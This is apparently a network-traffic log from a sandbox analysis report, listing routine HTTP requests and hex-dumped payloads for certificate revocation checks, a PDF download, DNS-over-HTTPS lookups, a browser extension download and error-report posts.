Mar 7, 2025 21:40:03.891699076 CET	975	IN	Data Raw: 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 Data Ascii: reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by<

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 21:40:42.256373882 CET	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 7, 2025 21:40:42.893840075 CET	223	IN	HTTP/1.1 304 Not Modified Date: Fri, 07 Mar 2025 20:09:15 GMT Expires: Fri, 07 Mar 2025 20:59:15 GMT Age: 1887 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Mar 7, 2025 21:40:42.901551962 CET	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 7, 2025 21:40:43.087176085 CET	223	IN	HTTP/1.1 304 Not Modified Date: Fri, 07 Mar 2025 20:09:17 GMT Expires: Fri, 07 Mar 2025 20:59:17 GMT Age: 1885 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:40:13 UTC	714	OUT	GET /392171258/files/doc_downloads/test.pdf HTTP/1.1 Host: s28.q4cdn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-03-07 20:40:13 UTC	518	IN	HTTP/1.1 200 OK Server: keycdn Date: Fri, 07 Mar 2025 20:40:13 GMT Content-Type: application/pdf Content-Length: 3908 Connection: close x-amz-id-2: MEJ/DaQ20IhNvbBtAOMQkVh3Rv/v58E1kDjZSPbBoSzQOXwZpc8fJwSYN/NLYrljEc8hjH6f7nc= x-amz-request-id: CYAZDEMEG8JSRWVB Last-Modified: Mon, 21 Jun 2021 14:40:45 GMT ETag: "331e8397807e65be4f838ccd95787880" Expires: Fri, 07 Mar 2025 21:40:13 GMT Cache-Control: max-age=3600 X-Cache: HIT X-Edge-Location: defr Access-Control-Allow-Origin: * Accept-Ranges: bytes
2025-03-07 20:40:13 UTC	3908	IN	Data Raw: 25 50 44 46 2d 31 2e 32 0d 25 e2 e3 cf d3 0d 0a 33 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 35 20 0d 2f 48 20 5b 20 37 36 30 20 31 35 37 20 5d 20 0d 2f 4c 20 33 39 30 38 20 0d 2f 45 20 33 36 35 38 20 0d 2f 4e 20 31 20 0d 2f 54 20 33 37 33 31 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 72 65 66 0d 33 20 31 35 20 0d 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 36 34 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 31 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 30 36 38 20 Data Ascii: %PDF-1.2%3 0 obj<< /Linearized 1 /O 5 /H [ 760 157 ] /L 3908 /E 3658 /N 1 /T 3731 >> endobj xref3 15 0000000016 00000 n0000000644 00000 n0000000917 00000 n0000001068

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:40:14 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-03-07 20:40:14 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-03-07 20:40:15 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 07 Mar 2025 20:40:14 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 91cce82539b327d2-SAN alt-svc: h3=":443"; ma=86400
2025-03-07 20:40:15 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d0 00 04 8e fb 28 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom(#)

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:40:14 UTC	594	OUT	GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-03-07 20:40:15 UTC	563	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AKDAyIspOzUsnctWw9YHGjqJgHaNVa_jzzOCGlMQh1vNO8E8ZnmYwUpqjybuTugoAeEqIrVq Accept-Ranges: bytes Content-Length: 154545 X-Goog-Hash: crc32c=048SZw== Server: UploadServer Date: Fri, 07 Mar 2025 06:32:18 GMT Expires: Sat, 07 Mar 2026 06:32:18 GMT Cache-Control: public, max-age=31536000 Age: 50877 Last-Modified: Tue, 18 Feb 2025 14:41:46 GMT ETag: 1ce33fd4_e3dec04f_5b9bae7c_2a4476c8_8092e87a Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-07 20:40:15 UTC	815	IN	Data Raw: 43 72 32 34 03 00 00 00 e7 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: 5a 8e ff f9 eb 37 51 dd ca eb 79 18 cf 97 fe db 3f be 8d d7 aa aa f3 5b fd b7 a1 ba fe ed 74 96 d5 b7 bf 7f bb 9d df fb 4a fc 52 5e fa b1 ea c7 6f ff f8 f5 db 90 3f e5 25 17 ea fd d5 33 68 0a c3 d2 38 b3 b4 d4 a8 eb d2 a8 65 f9 dc bf 30 f3 76 ce ba e9 33 33 c6 53 69 c8 17 9e ec 5f e0 ee a7 05 cf 8f 33 f7 64 cf 53 a8 ed 9b cb 59 bd bf 0e 1b 62 ec bf fe de c9 1b 4f c3 73 24 c7 1f fb de a9 85 f7 7e 8e ce fb 29 6c de ef a5 67 f5 5f ef 29 3b fb 53 00 fb 92 a5 f0 f2 f5 79 6e 40 c6 9f da c4 d8 fb 33 69 47 04 29 18 49 37 36 dc 83 5d de 11 5d cc 74 5f ea 01 84 3a df e2 2e 78 e6 7e b0 a9 3c 6e f1 67 60 1f fc db b9 f4 80 96 6f f7 2f 7b 69 df 0a 03 d6 85 47 e7 83 01 ba 83 a1 cb d2 84 35 37 d4 eb 6e 98 0b 63 73 3e 6c 83 67 61 d8 7f 8c f3 eb d9 82 29 77 65 4f cd 7a 97 Data Ascii: Z7Qy?[tJR^o?%3h8e0v33Si_3dSYbOs$~)lg_);Syn@3iG)I76]]t_:.x~<ng`o/{iG57ncs>lga)weOz
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: e1 18 91 21 e1 fe 90 57 ac 76 f3 9d 03 a9 36 b9 09 8d 37 b4 09 78 d6 b5 4f 08 4a 4b d5 2c 5c 64 af bc ff ca fb a3 6c a6 13 4f 55 bf 97 c8 80 9a 66 12 0a 72 e1 42 af d8 81 38 f7 21 0a a5 6b 8a ae de 22 17 28 0d 08 50 f9 d4 7d a4 89 cf c5 fb f7 fb b5 9e 7b 83 e7 60 0c 7b 29 b9 36 39 07 02 1f 21 19 3b 22 c5 b6 d8 09 37 d9 89 a0 24 3c 46 3a 72 ca 5e 69 34 51 7a 44 c9 14 fa cb 73 5f fe 3f 34 b8 6c d0 90 69 b5 14 3e bf e6 86 4c 13 37 1c b1 ef b8 71 c3 7b 6e 04 19 ea 54 29 98 ce 99 bb 3c 23 1d 3f 96 12 38 c8 10 9b e5 b5 27 d6 f2 1f 95 cf dd 20 8f bb 70 ae 5b e1 06 06 d6 41 07 7d ce 73 6d 38 e0 59 69 80 87 58 e8 ff 34 62 e3 f1 a0 3e 8a 33 82 76 55 f7 fe 58 e4 6f ae 5d 7b 83 0b 25 68 53 73 78 13 d2 9d 23 50 b7 58 87 04 99 75 a0 32 46 c2 5b 7d 56 59 87 a8 7e e0 c5 Data Ascii: !Wv67xOJK,\dlOUfrB8!k"(P}{`{)69!;"7$<F:r^i4QzDs_?4li>L7q{nT)<#?8' p[A}sm8YiX4b>3vUXo]{%hSsx#PXu2F[}VY~
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: df 3f 43 59 9f 10 b1 87 9c be 4e 44 e5 51 d6 2d e6 ab 7b b1 72 6f 45 65 c5 17 e5 d9 73 82 c5 01 33 95 a3 3a 6a 21 33 d8 56 dd 74 8c 12 ed 59 fa e2 9a 6b 28 a5 18 ec 12 30 80 7c e6 2d ef 54 ee 58 62 6f 3a f5 5a 9f 13 91 8d 45 58 d0 71 b6 d7 b1 4e 3f 60 3b b8 9c 59 35 6b 00 c4 64 8c 91 67 dd 71 57 4b e6 02 23 a1 d0 aa 3a f0 81 54 6d 2e b1 2f bd 95 ec e5 40 f2 06 f0 b2 71 ce 25 b3 0f 98 20 23 36 d1 86 77 fc 2d c3 ce 27 56 ae 1f b5 76 0d 99 fd a4 5a a6 e3 f6 55 4f cc 52 cf 77 3f 97 d8 3f 14 df 2d 59 a9 3b a5 ef 4e 1c bc 9b bc 1d 14 f3 a0 a7 3b 34 26 1d 8c b0 ab 74 88 b4 8f af fd 46 ec 0d b7 cc e4 5f eb af cd fa e0 19 7a fb e7 ff c1 5f 4b 75 87 ac ad 7f aa db 7b 91 3a 1a 73 c7 b7 58 b3 fd 42 42 16 cf b4 4d 40 3c 13 d0 5a 8c 8d 2f e1 ce c9 12 2c f4 92 c0 0b 92 Data Ascii: ?CYNDQ-{roEes3:j!3VtYk(0\|-TXbo:ZEXqN?`;Y5kdgqWK#:Tm./@q% #6w-'VvZUORw??-Y;N;4&tF_z_Ku{:sXBBM@<Z/,
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: bf e2 7c 0c 41 ed 15 1a 3c 60 0f 76 71 2f a2 dc 05 2c 66 ae c6 d4 f8 0e 4c 7b c6 5d f0 a1 32 9e 5e ba d6 91 28 bf 5f b6 d9 23 66 b7 3f e5 4a f5 1c 3d a7 b6 2c 98 1a 3b b0 bf 18 0c a5 1f ff b7 fb 82 03 e1 29 76 ad 6d 6a 0a 3f 4c 9d 30 c2 ea 7f 6e bd ff 3a c3 04 77 ef 96 aa a7 2b 56 3e 17 35 c0 55 1a 98 54 ae 5d 27 ad f5 27 7d 2f 0d fa 14 9d 6c d4 bd cd c2 0c ae aa ce 4e 59 27 ef a9 e9 a8 7b fe d7 fb cf 54 3a a7 90 0d a6 12 73 a0 bc 15 83 b4 ce a9 87 5a 35 af 46 d8 e9 b0 da f1 5a 74 82 97 3b e7 a5 20 e3 47 d1 50 af 6c 84 ca 74 ba 50 d7 eb d4 bd c6 2c 8d bf ae a5 7d 31 ff a3 96 6e fb ee df e7 2d 4f 7f 79 ce f2 f7 cf 0e c2 a3 63 6a c8 f6 f7 b3 92 b5 aa 51 eb 9e ab ba e0 6c 7c 14 cc 96 99 61 dd 8b 4e de 8a ce 52 fe 73 fa 2c bc fa 9a 7b ed f9 7f 3f 6b aa 7a ee Data Ascii: \|A<`vq/,fL{]2^(_#f?J=,;)vmj?L0n:w+V>5UT]''}/lNY'{T:sZ5FZt; GPltP,}1n-OycjQl\|aNRs,{?kz
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 2d 00 73 65 72 76 69 63 65 5f 77 6f 72 6b 65 72 5f 62 69 6e 5f 70 72 6f 64 2e 6a 73 55 54 05 00 01 72 77 a2 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 05 27 c4 42 77 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc bd 7b 5f db c8 92 00 fa 7f 3e 85 f1 2f cb 48 b1 70 6c 20 99 c4 46 f1 12 42 12 12 42 08 90 d7 30 9c dc 96 d4 7a 80 6c 39 7e 10 20 f6 7e f6 5b 55 dd 2d 75 cb 32 30 e7 ec de df 9d dd 13 64 a9 9f d5 f5 ee ea ea 3f a6 63 5e 1b 4f 46 89 3f f9 a3 1b 4e 07 fe 24 c9 06 35 c6 2c fb f7 88 4f a6 a3 41 4d bd b4 58 fe 8a cd e7 79 d1 8b 8a 92 f6 6f ad 80 5e 51 2b 21 df 4c e2 64 7c ca ce b4 f2 1e bb b5 02 f4 7d c9 46 b5 9f c5 60 7d aa 80 2f 3d b7 d5 5d 5a d1 db 62 cd 94 0f a2 49 dc fb Data Ascii: !-service_worker_bin_prod.jsUTrwg 'Bw{_>/Hpl FBB0zl9~ ~[U-u20d?c^OF?N$5,OAMXyo^Q+!Ld\|}F`}/=]ZbI
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: 21 b9 18 02 19 54 68 64 a6 f8 51 a3 98 cd 42 26 c5 15 e0 5d 3f 19 f3 a5 1a 40 21 87 5b 5d 7a 48 dd cb 2c 09 6a f2 d7 39 c2 9d 9e b6 81 23 90 08 8d 5d fa 9d 59 36 31 95 c8 02 e1 c9 c7 59 7a c9 1d 7c 42 c8 d8 92 95 a4 f6 6f f5 0a 9e e7 ba 06 90 77 4b 94 9f 7f 08 70 40 72 1a 91 a1 93 f4 a2 0e 71 4d 2b 9f 48 0c ad 43 f1 5b 75 80 f3 82 e3 47 b9 ae 03 bd 52 b7 f9 18 60 8e c5 cc 24 18 2c 4d 54 c4 cd 4b 0b fb 11 c5 05 c6 41 c7 5d a1 e4 85 0c f9 f1 49 d2 e7 d9 74 62 f4 9e 1a bd 73 2b 72 5a 50 4b 2f 71 a9 4b 24 c4 16 d1 7b 04 a2 55 f4 25 b1 42 f0 80 48 80 3e ea 16 e3 56 18 16 c3 fa c5 5b 51 a1 32 c7 a2 4a ea 3e 88 4e e3 b3 2e fe 43 93 a6 45 4b 2d b5 44 7d 09 84 0c 9e c0 7c d1 17 c5 18 68 66 4c 65 11 44 82 2d 44 5d 80 52 d7 ab ae a7 e1 5d 84 fd 96 0d ae a1 fd 3b 9d Data Ascii: !ThdQB&]?@![]zH,j9#]Y61Yz\|BowKp@rqM+HC[uGR`$,MTKA]Itbs+rZPK/qK${U%BH>V[Q2J>N.CEK-D}\|hfLeD-D]R];
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: 5e f0 2c 0c 45 53 fc ae 80 ad bc 92 3b d5 58 5a 68 46 28 42 84 94 d3 3e 5b bf e7 b6 d3 5f 78 f3 60 48 13 66 d6 e9 69 ea ac 9f 39 a7 7d 67 e3 ec 8c 56 72 88 7e 22 98 ea 8a bb 3e 9b 89 1f 7d f8 b1 51 74 04 2c 8b a7 7c 82 90 84 67 5a 42 67 53 0d 1c 18 1a 90 22 7c 5a 5d 55 95 5d 77 53 8a b4 2b 45 24 a0 fb cf 01 29 72 0b 58 20 74 fd a1 74 75 c7 49 10 f0 c1 8f 7a c3 c0 ba 6e 68 d5 85 07 a3 4e cf c3 11 47 c5 47 02 11 f4 4e f1 1a 27 29 9d e7 68 63 ea 52 0b c6 5a ac 51 0a f2 91 20 8a d8 65 2a e0 7b 03 40 00 20 1a 49 22 b5 0b 7e 0d 2d d2 84 75 d4 31 ea 68 65 6b 21 4b 52 94 54 50 3e 05 bd e7 54 d0 d1 99 db ef 6a f2 d5 14 a8 91 31 b4 9c 99 04 04 49 d9 61 4f 6f ac 23 c9 ba 64 2e 8e ef 68 e5 41 24 9f a0 29 47 5a 0a 66 1b 62 71 ef 1c cc 42 2b 3d 51 b1 66 0c 12 16 ba bc Data Ascii: ^,ES;XZhF(B>[_x`Hfi9}gVr~">}Qt,\|gZBgS"\|Z]U]wS+E$)rX ttuIznhNGGN')hcRZQ e*{@ I"~-u1hek!KRTP>Tj1IaOo#d.hA$)GZfbqB+=Qf
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: cd 0b 2e 20 65 07 8d e1 df 9f a6 dc 9f 91 d1 02 95 41 91 27 31 af fd 81 85 fe a8 11 6e 60 80 51 6d 69 bf b5 fe 74 3c a1 38 19 8f d7 b0 51 8c 91 d1 76 d0 c8 ff a8 03 f4 88 47 bb 57 c3 ea ae 5f 27 23 68 4c 05 89 e0 8e f4 fd fa 65 b5 11 8f a6 29 2e ca 15 28 63 e3 31 89 21 89 83 34 e1 46 bd 6e 0b ed f3 63 88 90 80 e5 02 99 e1 ae b5 4d f4 09 47 59 ff 5e 90 44 72 84 55 17 bb 5c 3d bf 83 51 e2 12 2b 80 3e c2 7f 16 d9 e4 55 46 36 c9 26 cc 80 b9 df 1e 48 0f 22 6c af d0 06 50 c7 58 01 4c f2 4a fa 00 17 04 59 70 02 a9 e2 44 80 86 32 5e 0b 9b c0 8a d2 89 2c 76 e9 c2 2e 96 28 d7 f6 d0 95 13 15 5b 45 dc 24 6d c9 54 ff 17 19 c9 29 f6 19 9c 95 98 09 2e 96 08 3d 02 6a 79 8d 7b 9c cb 1d f6 7a 9f e6 4e 1b 72 10 15 13 46 66 64 32 3e 60 07 50 8e 82 93 dd bd 41 88 2d 5f 8b 5f Data Ascii: . eA'1n`Qmit<8QvGW_'#hLe).(c1!4FncMGY^DrU\=Q+>UF6&H"lPXLJYpD2^,v.([E$mT).=jy{zNrFfd2>`PA-__
2025-03-07 20:40:15 UTC	1378	IN	Data Raw: 5d 49 9d cd 31 16 eb fa 20 64 84 0b 12 7f ba be 3d 67 ea 4d 9f 8f c7 2c e2 6e 7e 34 88 4e b1 ca a0 29 55 c8 67 d3 31 80 3f 8f a9 06 01 76 6d ed 31 87 7a b1 bb 7b 3a a8 07 ac cf 5d 15 ad 8b df eb c5 24 df 09 fe a7 1d bf 58 3c 92 c0 ba 73 3a 75 81 f3 78 cf dc 05 45 00 7e f7 7b 55 ba 08 7d b1 ec 79 67 f1 e3 e3 7f 9d fe 3d fe fb 8a b5 ce 1e 59 f8 74 7c f6 a8 67 e7 af 1e 3e 16 e2 9b d9 a7 ed 33 d1 f1 3e 73 3e 30 17 24 58 7d 67 ff e3 f1 e7 a3 dd 1f af f7 b7 df 1c 83 c6 70 c0 40 d9 43 03 f0 f4 69 bb b5 d9 6a 6f b4 da 67 dd 7d e6 1e 48 96 dd 3b 60 1d f4 a5 ab 29 7f 64 92 ae 98 7b 09 b0 b9 4c 22 14 db 39 fd a0 ed 07 12 12 c0 3b da 8e 00 6f 6c d0 a8 ea 82 d1 1f 32 e7 93 59 e9 90 b9 9f 58 ef 93 56 fc 15 9b 80 08 c6 7e e9 44 5e d1 ed 91 4e 63 fb ac 77 88 ff df f4 50 Data Ascii: ]I1 d=gM,n~4N)Ug1?vm1z{:]$X<s:uxE~{U}yg=Yt\|g>3>s>0$X}gp@Cijog}H;`)d{L"9;ol2YXV~D^NcwP

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:40:14 UTC	442	OUT	OPTIONS /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Origin: https://business.bing.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-03-07 20:40:15 UTC	334	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Kestrel Date: Fri, 07 Mar 2025 20:40:15 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.07f21602.1741380015.28ca846c Access-Control-Allow-Headers: * Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:40:15 UTC	640	OUT	GET /favicon.ico HTTP/1.1 Host: s28.q4cdn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-03-07 20:40:17 UTC	190	IN	HTTP/1.1 403 Forbidden Server: keycdn Date: Fri, 07 Mar 2025 20:40:16 GMT Content-Type: text/html Content-Length: 1439 Connection: close ETag: "5ca0a75f-59f" X-Edge-Location: defr
2025-03-07 20:40:17 UTC	1439	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>403 Forbidden</title> <style type

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:40:16 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-03-07 20:40:16 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:40:19 UTC	382	OUT	POST /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Content-Length: 471 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-03-07 20:40:19 UTC	471	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 39 35 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 